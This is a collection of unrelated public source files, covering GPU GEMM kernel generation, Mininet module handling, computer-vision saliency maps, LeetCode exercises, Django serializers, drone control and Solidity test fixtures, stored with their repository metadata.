VMulLOU32(dst=vgpr(Holder(name=\"ValuC\")),\n                                               src0=sgpr(\"Alpha\"), src1=vgpr(\"ValuC+%u\"%srcIdx),\n                                               comment=\"Multiply MI out reg with alpha\")\n        elif kernel[\"ProblemType\"][\"ComputeDataType\"].isSingleComplex():\n            accImOffset = accVgprImagNumOffset(kernel)  # lrvwB is not defined in this scope; the helper takes only `kernel`\n            cimod = Module()\n            # cannot use tmp vgpr for write batch, use allocated vgpr instead\n            vtmp1 = startVgprAlphaTmp\n            vtmp2 = vtmp1 + 1\n            # tmp1 = a.real * b.real\n            cimod.add(VMulF32(dst=vgpr(vtmp1), src0=sgpr(\"Alpha+0\"), src1=vgpr(\"ValuC+%u\"%srcIdx), comment=\"\"))\n            # tmp2 = a.imag * b.real\n            cimod.add(VMulF32(dst=vgpr(vtmp2), src0=sgpr(\"Alpha+1\"), src1=vgpr(\"ValuC+%u\"%srcIdx), comment=\"\"))\n            # c.real = a.real * b.real - a.imag * b.imag = tmp1 - a.imag * b.imag\n            cimod.add(VFmaF32(dst=vgpr(Holder(name=\"ValuC\")), src0=sgpr(\"Alpha+1\"), src1=vgpr(\"ValuC+%u\"%(srcIdx+accImOffset)), src2=vgpr(vtmp1)))\n            # c.imag = a.real * b.imag + a.imag * b.real = a.real * b.imag + tmp2\n            cimod.add(VFmaF32(dst=vgpr(Holder(name=\"ValuC+1\")), src0=sgpr(\"Alpha+0\"), src1=vgpr(\"ValuC+%u\"%(srcIdx+accImOffset)), src2=vgpr(vtmp2)))\n            imod.itemList[destIdx] = cimod\n        elif kernel[\"ProblemType\"][\"ComputeDataType\"].isDoubleComplex():\n            accImOffset = accVgprImagNumOffset(kernel)\n            cimod = Module()\n            # cannot use tmp vgpr for write batch, use allocated vgpr instead\n            vtmp1 = startVgprAlphaTmp\n            vtmp2 = vtmp1 + 2\n            # tmp1 = 
a.real * b.real\n            cimod.add(VMulF64(dst=vgpr(vtmp1,2), src0=sgpr(\"Alpha+0\",2), src1=vgpr(\"ValuC+%u\"%srcIdx,2)))\n            # tmp2 = a.imag * b.real\n            cimod.add(VMulF64(dst=vgpr(vtmp2,2), src0=sgpr(\"Alpha+2\",2), src1=vgpr(\"ValuC+%u\"%srcIdx,2)))\n            # c.real = a.real * b.real - a.imag * b.imag = tmp1 - a.imag * b.imag\n            cimod.add(VFmaF64(dst=vgpr(Holder(name=\"ValuC\"),2), src0=sgpr(\"Alpha+2\",2), src1=vgpr(\"ValuC+%u\"%(srcIdx+accImOffset),2), src2=vgpr(vtmp1,2)))\n            # c.imag = a.real * b.imag + a.imag * b.real = a.real * b.imag + tmp2\n            cimod.add(VFmaF64(dst=vgpr(Holder(name=\"ValuC+2\"),2), src0=sgpr(\"Alpha+0\",2), src1=vgpr(\"ValuC+%u\"%(srcIdx+accImOffset),2), src2=vgpr(vtmp2,2)))\n            imod.itemList[destIdx] = cimod\n    return imod\n\n    ##############################################################################\n    # MoveMIoutToArch\n    # function to handle MFMA MIout to Arch VGPR register\n    ##############################################################################\ndef moveMIoutToArch(kernel, startVgprAlphaTmp):\n    acc2arch, _ = accToArchMapper(kernel)\n\n    imod = Module(\"MulAlpha\")\n    imod.itemList = [None] * len(acc2arch)\n    for i in range(len(acc2arch)):\n        destIdx = acc2arch[i]\n        srcIdx = i * kernel[\"MIRegPerOut\"]\n        if kernel[\"ProblemType\"][\"ComputeDataType\"].isDouble():\n            imod.itemList[destIdx] = VLShiftLeftB64(dst=vgpr(Holder(name=\"ValuC\"), 2),\n                                                    shiftHex=0,\n                                                    src=vgpr(\"ValuC+%u\"%srcIdx,2), comment=\"Rearrange MI out reg\")\n        elif kernel[\"ProblemType\"][\"ComputeDataType\"].isSingle() or \\\n             (kernel[\"ProblemType\"][\"ComputeDataType\"].isHalf() and kernel[\"ProblemType\"][\"HighPrecisionAccumulate\"]):\n            imod.itemList[destIdx] = VMovB32(dst=vgpr(Holder(name=\"ValuC\")),\n                                             src=vgpr(\"ValuC+%u\"%srcIdx), comment=\"Rearrange MI out reg\")\n        elif (kernel[\"ProblemType\"][\"ComputeDataType\"].isHalf() and not kernel[\"ProblemType\"][\"HighPrecisionAccumulate\"]):\n            imod.itemList[destIdx] = VMovB32(dst=vgpr(Holder(name=\"ValuC\")),\n                                             src=vgpr(\"ValuC+%u\"%srcIdx), comment=\"Rearrange MI out reg\")\n        elif kernel[\"ProblemType\"][\"ComputeDataType\"].isInt32():\n            imod.itemList[destIdx] = VMovB32(dst=vgpr(Holder(name=\"ValuC\")),\n                                             src=vgpr(\"ValuC+%u\"%srcIdx), comment=\"Rearrange MI out reg\")\n        elif kernel[\"ProblemType\"][\"ComputeDataType\"].isSingleComplex():\n            accImOffset = accVgprImagNumOffset(kernel)  # lrvwB is not defined in this scope; the helper takes only `kernel`\n            cimod = Module()\n            # copy the real part\n            cimod.add(VMovB32(dst=vgpr(Holder(name=\"ValuC\")), src=vgpr(\"ValuC+%u\"%srcIdx), comment=\"Rearrange MI out reg\"))\n            # copy the imaginary part (add(), not addInst(), matching every other call in this file)\n            cimod.add(VMovB32(dst=vgpr(Holder(name=\"ValuC+1\")), src=vgpr(\"ValuC+%u\"%(srcIdx+accImOffset)), comment=\"Rearrange MI out reg\"))\n            imod.itemList[destIdx] = cimod\n        elif kernel[\"ProblemType\"][\"ComputeDataType\"].isDoubleComplex():\n            accImOffset = accVgprImagNumOffset(kernel)\n            cimod = Module()\n            # copy the real part\n            cimod.add(VLShiftLeftB64(dst=vgpr(Holder(name=\"ValuC\"), 2), shiftHex=0, src=vgpr(\"ValuC+%u\"%srcIdx,2), comment=\"Rearrange MI out reg\"))\n            # copy the imaginary part\n            cimod.add(VLShiftLeftB64(dst=vgpr(Holder(name=\"ValuC+2\"), 2), shiftHex=0, src=vgpr(\"ValuC+%u\"%(srcIdx+accImOffset),2), comment=\"Rearrange MI out reg\"))\n            imod.itemList[destIdx] = cimod\n\n    return imod\n\n","repo_name":"ROCmSoftwarePlatform/hipBLASLt","sub_path":"tensilelite/Tensile/KernelWriterModules.py","file_name":"KernelWriterModules.py","file_ext":"py","file_size_in_byte":16910,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"5577268854","text":"\"Module 
dependency utility functions for Mininet.\"\n\nfrom os import environ\nfrom sys import exit # pylint: disable=redefined-builtin\n\nfrom mininet.util import quietRun, BaseString\nfrom mininet.log import info, error, debug\n\n\ndef lsmod():\n \"Return output of lsmod.\"\n return quietRun( 'lsmod' )\n\ndef rmmod( mod ):\n \"\"\"Return output of lsmod.\n mod: module string\"\"\"\n return quietRun( [ 'rmmod', mod ] )\n\ndef modprobe( mod ):\n \"\"\"Return output of modprobe\n mod: module string\"\"\"\n return quietRun( [ 'modprobe', mod ] )\n\n\nOF_KMOD = 'ofdatapath'\nOVS_KMOD = 'openvswitch_mod' # Renamed 'openvswitch' in OVS 1.7+/Linux 3.5+\nTUN = 'tun'\n\ndef moduleDeps( subtract=None, add=None ):\n \"\"\"Handle module dependencies.\n subtract: string or list of module names to remove, if already loaded\n add: string or list of module names to add, if not already loaded\"\"\"\n subtract = subtract if subtract is not None else []\n add = add if add is not None else []\n if isinstance( subtract, BaseString ):\n subtract = [ subtract ]\n if isinstance( add, BaseString ):\n add = [ add ]\n for mod in subtract:\n if mod in lsmod():\n info( '*** Removing ' + mod + '\\n' )\n rmmodOutput = rmmod( mod )\n if rmmodOutput:\n error( 'Error removing ' + mod + ': \"%s\">\\n' % rmmodOutput )\n exit( 1 )\n if mod in lsmod():\n error( 'Failed to remove ' + mod + '; still there!\\n' )\n exit( 1 )\n for mod in add:\n if mod not in lsmod():\n info( '*** Loading ' + mod + '\\n' )\n modprobeOutput = modprobe( mod )\n if modprobeOutput:\n error( 'Error inserting ' + mod +\n ' - is it installed and available via modprobe?\\n' +\n 'Error was: \"%s\"\\n' % modprobeOutput )\n if mod not in lsmod():\n error( 'Failed to insert ' + mod + ' - quitting.\\n' )\n exit( 1 )\n else:\n debug( '*** ' + mod + ' already loaded\\n' )\n\n\ndef pathCheck( *args, **kwargs ):\n \"Make sure each program in *args can be found in $PATH.\"\n moduleName = kwargs.get( 'moduleName', 'it' )\n for arg in args:\n if not quietRun( 'which ' + arg ):\n error( 'Cannot find required executable %s.\\n' % arg +\n 'Please make sure that %s is installed ' % moduleName +\n 'and available in your $PATH:\\n(%s)\\n' % environ[ 'PATH' ] )\n exit( 1 )\n","repo_name":"mininet/mininet","sub_path":"mininet/moduledeps.py","file_name":"moduledeps.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":4978,"dataset":"github-code","pt":"21"} +{"seq_id":"34957198598","text":"import cv2\n\nimg1 = cv2.imread('resize_model1.jpg')\nimg2 = cv2.imread('opencv-logo-white.png')\n\n# I want to put logo on top-left corner, So I create a ROI\nrows, cols, channels = img2.shape\nprint(rows, cols, channels) # 222 180 3\n\nroi = img1[0:rows, 0:cols]\n\n# Now create a mask of logo and create its inverse mask also\nimg2gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\nret, mask = cv2.threshold(img2gray, 10, 255, cv2.THRESH_BINARY)\nmask_inv = cv2.bitwise_not(mask)\n\n# Now black-out the area of logo in ROI\nimg1_bg = cv2.bitwise_and(roi, roi, mask=mask_inv)\n\n# Take only region of logo from logo image.\nimg2_fg = cv2.bitwise_and(img2, img2, mask=mask)\n\n# Put logo in ROI and modify the main image\ndst = cv2.add(img1_bg, img2_fg)\nimg1[0:rows, 0:cols] = dst\n\ncv2.imshow('bg', img1_bg)\ncv2.imshow('fg', img2_fg)\n\ncv2.imshow('res', img1)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"jacegem/OpenCV-Python-Tutorials","sub_path":"08. 
이미지의 산술 연산/03 비트 연산.py","file_name":"03 비트 연산.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"38507390837","text":"# given two integers dividend and divisor, divide the two ints\n# without using the division, multiplication, or mod operators\n# return the quotient, truncated toward zero, ie truncate(8.345) = 8\n# return 2^31 - 1 when the division result overflows\n\n# this works, but LeetCode's large inputs exceed Python's recursion limit\n\nimport timeit\nstart=timeit.default_timer()\n\nclass Solution:\n    def divide(self,dividend: int, divisor: int) -> int:\n        output=0\n        dividendbool=False\n        divisorbool=False\n        if dividend <=0:\n            dividendbool=True\n            dividend *=-1\n        if divisor <=0:\n            divisorbool=True\n            divisor *= -1\n        result=dividend-divisor\n        if result>=0:\n            output+=1\n            output+=Solution.divide(self,result,divisor)\n        if not -2147483648 <= output <= 2147483647:  # clamp when the result leaves the 32-bit range\n            return 2147483647\n\n        if (dividendbool==False and divisorbool==False) or (dividendbool==True and divisorbool==True):\n            return output\n        else:\n            return output*-1\n\n\ns=Solution()\nx=Solution.divide(s,88,4)\nprint(x)\n\n\n","repo_name":"conordrayton/Leetcode","sub_path":"divide.py","file_name":"divide.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18322822413","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import LabelEncoder\n\nfrom app.kernel.kernel import Kernel\n\n\nclass LogisticKernel(Kernel):\n\n    def __init__(self, kernel_id):\n        super().__init__(kernel_id)\n        self.reg: LogisticRegression or None = None\n        self.le = LabelEncoder()\n\n    def fit(self):\n        reg = LogisticRegression()\n\n        data = self.data\n        labels, features = zip(*[(it['label'], it['features']) for it in data['data']])\n        labels = np.array(labels)\n        encoded_labels = self.le.fit_transform(labels)  # LabelEncoder expects a 1-D array, not an (n, 1) column\n\n        reg.fit(pd.DataFrame(features).values, encoded_labels)\n        self.reg = reg\n\n    def predict_one(self, features):\n        encoded_result = self.reg.predict([list(features.values())])[0]\n        return self.le.inverse_transform([encoded_result])[0]\n","repo_name":"donautech/behaiv-remote-kernel","sub_path":"app/kernel/logistic/LogisticRegressionKernel.py","file_name":"LogisticRegressionKernel.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"15324389615","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\nimport tensorflow as tf\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.models import Model\nimport gc\n\ntf.compat.v1.disable_eager_execution()\n\ndef normalize(x):\n    \"\"\"Utility function to normalize a tensor by its L2 norm\"\"\"\n    return (x + 1e-10) / (K.sqrt(K.mean(K.square(x))) + 1e-10)\n\ndef GradCam(model, img_array, layer_name):\n    cls = np.argmax(model.predict(img_array))\n\n    \"\"\"GradCAM method for visualizing input saliency.\"\"\"\n    y_c = model.output[0, cls]\n    conv_output = model.get_layer(layer_name).output\n    grads = tf.gradients(y_c, conv_output)[0]\n    # grads = normalize(grads)\n\n    gradient_function = K.function([model.input], [conv_output, grads])\n    output, grads_val = gradient_function([img_array])\n    output, grads_val = output[0, :], grads_val[0, :, :, :]\n    weights = np.mean(grads_val, axis=(0, 1))\n\n    cam = 
np.dot(output, weights)\n cam = np.maximum(cam, 0) # Passing through ReLU\n cam /= np.max(cam) # scale 0 to 1.0 \n\n return cam\n\ndef GradCamPlusPlus(model, img_array, layer_name):\n cls = np.argmax(model.predict(img_array))\n y_c = model.output[0, cls]\n conv_output = model.get_layer(layer_name).output\n grads = tf.gradients(y_c, conv_output)[0]\n # grads = normalize(grads)\n\n first = K.exp(y_c)*grads\n second = K.exp(y_c)*grads*grads\n third = K.exp(y_c)*grads*grads*grads\n\n gradient_function = K.function([model.input], [y_c,first,second,third, conv_output, grads])\n y_c, conv_first_grad, conv_second_grad,conv_third_grad, conv_output, grads_val = gradient_function([img_array])\n global_sum = np.sum(conv_output[0].reshape((-1,conv_first_grad[0].shape[2])), axis=0)\n\n alpha_num = conv_second_grad[0]\n alpha_denom = conv_second_grad[0]*2.0 + conv_third_grad[0]*global_sum.reshape((1,1,conv_first_grad[0].shape[2]))\n alpha_denom = np.where(alpha_denom != 0.0, alpha_denom, np.ones(alpha_denom.shape))\n alphas = alpha_num/alpha_denom\n\n weights = np.maximum(conv_first_grad[0], 0.0)\n alpha_normalization_constant = np.sum(np.sum(alphas, axis=0),axis=0)\n alphas /= alpha_normalization_constant.reshape((1,1,conv_first_grad[0].shape[2]))\n deep_linearization_weights = np.sum((weights*alphas).reshape((-1,conv_first_grad[0].shape[2])),axis=0)\n\n cam = np.sum(deep_linearization_weights*conv_output[0], axis=2)\n cam = np.maximum(cam, 0) # Passing through ReLU\n cam /= np.max(cam) # scale 0 to 1.0 \n\n return cam\n\ndef softmax(x):\n f = np.exp(x)/np.sum(np.exp(x), axis = 1, keepdims = True)\n return f\n\ndef ScoreCam(model, img_array, layer_name, max_N=-1):\n\n cls = np.argmax(model.predict(img_array))\n act_map_array = Model(inputs=model.input, outputs=model.get_layer(layer_name).output).predict(img_array)\n \n # extract effective maps\n if max_N != -1:\n act_map_std_list = [np.std(act_map_array[0,:,:,k]) for k in range(act_map_array.shape[3])]\n unsorted_max_indices = np.argpartition(-np.array(act_map_std_list), max_N)[:max_N]\n max_N_indices = unsorted_max_indices[np.argsort(-np.array(act_map_std_list)[unsorted_max_indices])]\n act_map_array = act_map_array[:,:,:,max_N_indices]\n\n input_shape = model.layers[0].output_shape[0][1:] # get input shape\n # 1. upsampled to original input size\n act_map_resized_list = [cv2.resize(act_map_array[0,:,:,k], input_shape[:2], interpolation=cv2.INTER_LINEAR) for k in range(act_map_array.shape[3])]\n # 2. normalize the raw activation value in each activation map into [0, 1]\n act_map_normalized_list = []\n for act_map_resized in act_map_resized_list:\n if np.max(act_map_resized) - np.min(act_map_resized) != 0:\n act_map_normalized = act_map_resized / (np.max(act_map_resized) - np.min(act_map_resized))\n else:\n act_map_normalized = act_map_resized\n act_map_normalized_list.append(act_map_normalized)\n # 3. project highlighted area in the activation map to original input space by multiplying the normalized activation map\n masked_input_list = []\n for act_map_normalized in act_map_normalized_list:\n masked_input = np.copy(img_array)\n for k in range(3):\n masked_input[0,:,:,k] *= act_map_normalized\n masked_input_list.append(masked_input)\n masked_input_array = np.concatenate(masked_input_list, axis=0)\n # 4. feed masked inputs into CNN model and softmax\n pred_from_masked_input_array = softmax(model.predict(masked_input_array))\n # 5. define weight as the score of target class\n weights = pred_from_masked_input_array[:,cls]\n # 6. 
get final class discriminative localization map as linear weighted combination of all activation maps\n cam = np.dot(act_map_array[0,:,:,:], weights)\n cam = np.maximum(0, cam) # Passing through ReLU\n cam /= np.max(cam) # scale 0 to 1.0\n \n return cam\n\ndef superimpose(original_img_path, cam, emphasize=False):\n \n img_bgr = cv2.imread(original_img_path)\n\n heatmap = cv2.resize(cam, (img_bgr.shape[1], img_bgr.shape[0]))\n if emphasize:\n heatmap = sigmoid(heatmap, 50, 0.5, 1)\n heatmap = np.uint8(255 * heatmap)\n heatmap = cv2.applyColorMap(heatmap, cv2.COLORMAP_JET)\n \n hif = .8\n superimposed_img = heatmap * hif + img_bgr\n superimposed_img = np.minimum(superimposed_img, 255.0).astype(np.uint8) # scale 0 to 255 \n superimposed_img_rgb = cv2.cvtColor(superimposed_img, cv2.COLOR_BGR2RGB)\n \n return superimposed_img_rgb\n\nimport tensorflow.keras\n\nimport tensorflow as tf\nfrom tensorflow.python.framework import ops\nfrom tensorflow.keras.applications.vgg16 import preprocess_input\n\ndef build_guided_model(build_model_function):\n \"\"\"Function returning modified model.\n \n Changes gradient function for all ReLu activations according to Guided Backpropagation.\n \"\"\"\n if \"GuidedBackProp\" not in ops._gradient_registry._registry:\n @ops.RegisterGradient(\"GuidedBackProp\")\n def _GuidedBackProp(op, grad):\n dtype = op.inputs[0].dtype\n return grad * tf.cast(grad > 0., dtype) * \\\n tf.cast(op.inputs[0] > 0., dtype)\n\n g = tf.compat.v1.get_default_graph()\n with g.gradient_override_map({'Relu': 'GuidedBackProp'}):\n new_model = build_model_function()\n return new_model\n\ndef GuidedBackPropagation(model, img_array, layer_name):\n model_input = model.input\n layer_output = model.get_layer(layer_name).output\n max_output = K.max(layer_output, axis=3)\n grads = tf.gradients(max_output, model_input)[0]\n get_output = K.function([model_input], [grads])\n saliency = get_output([img_array])\n saliency = np.clip(saliency[0][0], 0.0, 1.0) # scale 0 to 1.0 \n return saliency\n\ndef sigmoid(x, a, b, c):\n return c / (1 + np.exp(-a * (x-b)))\n\nfrom tensorflow.keras.preprocessing.image import load_img, img_to_array\n\ndef read_and_preprocess_img(path, size=(224,224)):\n img = load_img(path, target_size=size)\n x = img_to_array(img)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n return x","repo_name":"tabayashi0117/Score-CAM","sub_path":"gradcamutils.py","file_name":"gradcamutils.py","file_ext":"py","file_size_in_byte":7093,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"21"} +{"seq_id":"36652595393","text":"# You are given the heads of two sorted linked lists list1 and list2.\n# Merge the two lists in a one sorted list. The list should be made by splicing together the nodes of the first two lists.\n# Return the head of the merged linked list.\n\n# Ex 1:\n# Input: list1 = [1,2,4], list2 = [1,3,4]\n# Output: [1,1,2,3,4,4]\n# Example 2:\n\n# Input: list1 = [], list2 = []\n# Output: []\n# Example 3:\n\n# Input: list1 = [], list2 = [0]\n# Output: [0]\n\n# Constraints:\n\n# The number of nodes in both lists is in the range [0, 50].\n# -100 <= Node.val <= 100\n# Both list1 and list2 are sorted in non-decreasing order.\n\n# Solution 1 : Iterative Approach\n# First you initialize dummy and temp. One is sitting at the start of the linkedlist and the other (temp) is going to move forward\n# find which value should be added to the list. Note that it's initialized with a value 0 but it can be anything! 
You initialize \n# it with your value of choice! Doesn't matter since we're going to finally return dummy.next which disregards 0 that we used to \n# start the linkedlist. Line #1 makes sure none of the l1 and l2 are empty! If one of them is empty, \n# we should return the other! If both are nonempty, we check val of each of them to add the smaller one to the result linkedlist! \n# In line #2, l1.val is smaller and we want to add it to the list. How? We use temp POINTER (it's pointer, remember that!). \n# Since we initialized temp to have value 0 at first node, we use temp.next to point 0 to the next value we're going to add to \n# the list l1.val (line #3). Once we do that, we update l1 to go to the next node of l1. If the if statement of line #2 doesn't work, we do similar stuff with l2. And finally, if the length of l1 and l2 are not the same, we're going to the end of one of them at some point! Line #5 adds whatever left from whatever linkedlist to the temp.next (check the above video for a great explanation of this part). Note that both linkedlists were sorted initially. Also, this line takes care of when one of the linkedlists are empty. Finally, we return dummy.next since dummy is pointing to 0 and next to zero is what we've added throughout the process.\n\n# Time: O(m+n) which is the lenght of 2 ll's, Space : O(1)\n\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode: \n dummy = temp = ListNode(0)\n while l1 and l2: #1\n\n if l1.val < l2.val: #2\n temp.next = l1 #3\n l1 = l1.next #4\n else: \n temp.next = l2\n l2 = l2.next\n temp = temp.next # IMP : Move on to the next element\n temp.next = l1 or l2 #5\n return dummy.next #6\n\n# Solution 2 : Recursive Approach\n# Another way of solving is problem is by doing recursion. The first check is obvious! If one of them is empty, return the other one! Similar to line \n#5 of previous solution. Here, we have two cases, whatever list has the smaller first element (equal elements also satisfies line #1), will be returned at the end. \n# In the example l1 = [1,2,4], l2 = [1,3,4], we go in the if statement of line #1 first, this means that the first element of l1 doesn't get changed! Then, we move the pointer to the second element of l1 by calling the function again but with l1.next and l2 as input! This round of call, goes to line #2 because now we have element 1 from l2 versus 2 from l1. Now, basically, l2 gets connected to the tail of l1. \n# We keep moving forward by switching between l1 and l2 until the last element. 
\n\nclass Solution:\n    def mergeTwoLists(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n        if not l1 or not l2:\n            return l1 or l2\n        if l1.val <= l2.val: #1\n            l1.next = self.mergeTwoLists(l1.next, l2)\n            return l1\n        else: #2\n            l2.next = self.mergeTwoLists(l1, l2.next)\n            return l2 ","repo_name":"nischal-hp/Coding-Problems","sub_path":"Linked List/MergeTwoSortedLists.py","file_name":"MergeTwoSortedLists.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27574770755","text":"import socket\n\n\n\nserver=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\nhost=\"105.165.63.122\"\nport=7636\n\nserver.connect((host,port))\nprint(\"waiting for messages..\")\n\nwhile True:\n    server_messg=server.recv(1024)\n\n    print(\"received:\",server_messg.decode())\n\n    client_messg=input(\"sent:\")\n    server.send(client_messg.encode())\n","repo_name":"Rogendo/Sending-text-messages","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29384468341","text":"from rest_framework import serializers\r\n\r\nfrom .models import Customer, Address, Order, OrderItems\r\n\r\nclass CustomerSerializer(serializers.ModelSerializer):\r\n    class Meta:\r\n        model = Customer\r\n        fields = \"__all__\"\r\n\r\n    def create(self, validated_data):\r\n        return Customer.objects.create(**validated_data)\r\n\r\n    def update(self, instance, validated_data):\r\n        instance.first_name = validated_data.get('first_name', instance.first_name)\r\n        instance.last_name = validated_data.get('last_name', instance.last_name)\r\n        instance.prime_customer = validated_data.get('prime_customer', instance.prime_customer)  # fall back to the instance's own prime_customer field\r\n        instance.customer_since = validated_data.get('customer_since', instance.customer_since)\r\n\r\n        instance.save()\r\n        return instance\r\n\r\nclass AddressSerializer(serializers.ModelSerializer):\r\n    class Meta:\r\n        model = Address\r\n        fields = \"__all__\"\r\n\r\n    def create(self, validated_data):\r\n        return Address.objects.create(**validated_data)\r\n\r\n    def update(self, instance, validated_data):\r\n        instance.street = validated_data.get('street', instance.street)\r\n        instance.city = validated_data.get('city', instance.city)\r\n        instance.state = validated_data.get('state', instance.state)\r\n        instance.zip_code = validated_data.get('zip_code', instance.zip_code)\r\n\r\n        instance.save()\r\n        return instance\r\n\r\nclass OrderSerializer(serializers.ModelSerializer):\r\n    class Meta:\r\n        model = Order\r\n        fields = \"__all__\"\r\n\r\n    def create(self, validated_data):\r\n        return Order.objects.create(**validated_data)\r\n\r\n    def update(self, instance, validated_data):\r\n        instance.order_number = validated_data.get('order_number', instance.order_number)\r\n        instance.item_description = validated_data.get('item_description', instance.item_description)\r\n        instance.item_quantity = validated_data.get('item_quantity', instance.item_quantity)\r\n        instance.payment_type = validated_data.get('payment_type', instance.payment_type)\r\n        instance.account_number = validated_data.get('account_number', instance.account_number)\r\n\r\n        instance.save()\r\n        return instance\r\n\r\nclass OrderItemsSerializer(serializers.ModelSerializer):\r\n    print('test1')\r\n    class Meta:\r\n        print('test2')\r\n        model = OrderItems\r\n        fields = \"__all__\"\r\n\r\n    def create(self, validated_data):\r\n        print('test3')\r\n        
return OrderItems.objects.create(**validated_data)\r\n\r\n def update(self, instance, validated_data):\r\n print('test4')\r\n instance.item_description = validated_data.get('item_description', instance.item_description)\r\n instance.item_quantity = validated_data.get('item_quantity', instance.item_quantity)\r\n\r\n instance.save()\r\n return instance\r\n","repo_name":"mattcodesz/DjangoProject","sub_path":"FinalProject/FinalApp/Serializers.py","file_name":"Serializers.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43936060830","text":"from mellinger_trj_nlopt import Mellinger\nimport rospy\nfrom polynomialTrjNonlinear.vertex import Vertex\n\n\nclass CentrolizedController(object):\n def __init__(self):\n dimension = 3\n self.quads = [\n Mellinger('hummingbird_0', 0.95, 0.0, 0.35),\n Mellinger('hummingbird_1', 0.0, 0.95, 0.35),\n Mellinger('hummingbird_2', -0.95, 0.0, 0.35),\n Mellinger('hummingbird_3', 0.0, -0.95, 0.35)\n ]\n self.num_of_quads = 4\n\n vertices = []\n vertex0 = Vertex(dimension=dimension, index=0)\n start_position = [0.0, 0.0, 0.0]\n start_velocity = [0.0, 0.0, 0.0]\n for nl_opt in self.quads:\n nl_opt.planner.construct_constrain(vertex0, order=0, input_list=start_position)\n nl_opt.planner.construct_constrain(vertex0, order=1, input_list=start_velocity)\n\n vertex0.makeStartOrEnd(position=start_position, up_to_order=4)\n\n vertex1 = Vertex(dimension=dimension, index=1)\n\n position = [2.0, 0.0, 2.0]\n velocity = [0.0, 0.0, 0.0]\n for nl_opt in self.quads:\n nl_opt.planner.construct_constrain(vertex1, order=0, input_list=position)\n nl_opt.planner.construct_constrain(vertex1, order=1, input_list=velocity)\n\n vertex2 = Vertex(dimension=dimension, index=2)\n position = [4.0, 0.0, 4.0]\n velocity = [0.0, 0.0, 0.0]\n for nl_opt in self.quads:\n nl_opt.planner.construct_constrain(vertex2, order=0, input_list=position)\n nl_opt.planner.construct_constrain(vertex2, order=1, input_list=velocity)\n\n vertex2.makeStartOrEnd(position=position, up_to_order=4)\n\n vertices.append(vertex0)\n vertices.append(vertex1)\n vertices.append(vertex2)\n\n times = [3.89891, 3.91507]\n\n for nl_opt in self.quads:\n nl_opt.planner.setupFromVertices(vertices, times)\n nl_opt.planner.add_max_vel(2.0)\n nl_opt.planner.add_max_acc(1.0)\n\n\nif __name__ == '__main__':\n central_controller = CentrolizedController()\n for i_controller in central_controller.quads:\n i_controller.optimize()\n i_controller.get_planned_pos_vel()\n i_controller.load_trj_lists()\n rospy.init_node(\"controller\", anonymous=True)\n rate = rospy.Rate(50)\n rospy.sleep(3.0)\n # for i in range(central_controller.num_of_quads):\n # central_controller.quads[i].planner.set_segment_time(segment_times=[3.0, 3.0])\n # central_controller.quads[i].solve_poly3d()\n # central_controller.quads[i].planner.add_offset()\n # central_controller.quads[i].load_trj_lists()\n\n while not rospy.is_shutdown():\n for i_controller in central_controller.quads:\n # i_controller.set_hover_des(1.5)\n # i_controller.hover_and_trj_xy(dimension='x')\n i_controller.publish_poly3d_trj()\n i_controller.publish_err()\n i_controller.update_current_state()\n i_controller.update_desired_values()\n i_controller.motorSpeedFromU()\n # i_controller.multiply_motor_speed(1.2)\n i_controller.send_motor_command()\n 
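# sleep() paces the control loop at the 50 Hz rate configured above\n            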
rate.sleep()\n\n","repo_name":"intelligent-control-lab/Collaborative_Aerial_Transportation","sub_path":"rotors_gazebo/scripts/collaborative/control_node_collaborative.py","file_name":"control_node_collaborative.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"21"} +{"seq_id":"9273501105","text":"import time\n\nfrom brownie import (\n DemoStrategy,\n Vault,\n MockToken,\n AdminUpgradeabilityProxy,\n TestVipCappedGuestListBbtcUpgradeable,\n accounts,\n)\n\nfrom helpers.constants import AddressZero\nfrom rich.console import Console\n\nconsole = Console()\n\nfrom dotmap import DotMap\nimport pytest\n\nperformanceFeeGovernance = 1000\nperformanceFeeStrategist = 1000\nwithdrawalFee = 50\nmanagementFee = 50\n\n################# Token #################\n\n\n@pytest.fixture\ndef token(badger, deployer):\n token = MockToken.deploy({\"from\": deployer})\n token.initialize([badger.address], [1000 * 10 ** 18])\n return token\n\n\n#########################################\n\n################# Actors #################\n\n# Initializer and giver of tokens\n@pytest.fixture\ndef badger():\n yield accounts[0]\n\n\n@pytest.fixture\ndef deployer():\n yield accounts[1]\n\n\n@pytest.fixture\ndef governance():\n yield accounts[2]\n\n\n@pytest.fixture\ndef keeper():\n yield accounts[3]\n\n\n@pytest.fixture\ndef guardian():\n yield accounts[4]\n\n\n@pytest.fixture\ndef proxyAdmin():\n yield accounts[5]\n\n\n@pytest.fixture\ndef strategist():\n yield accounts[6]\n\n\n@pytest.fixture\ndef 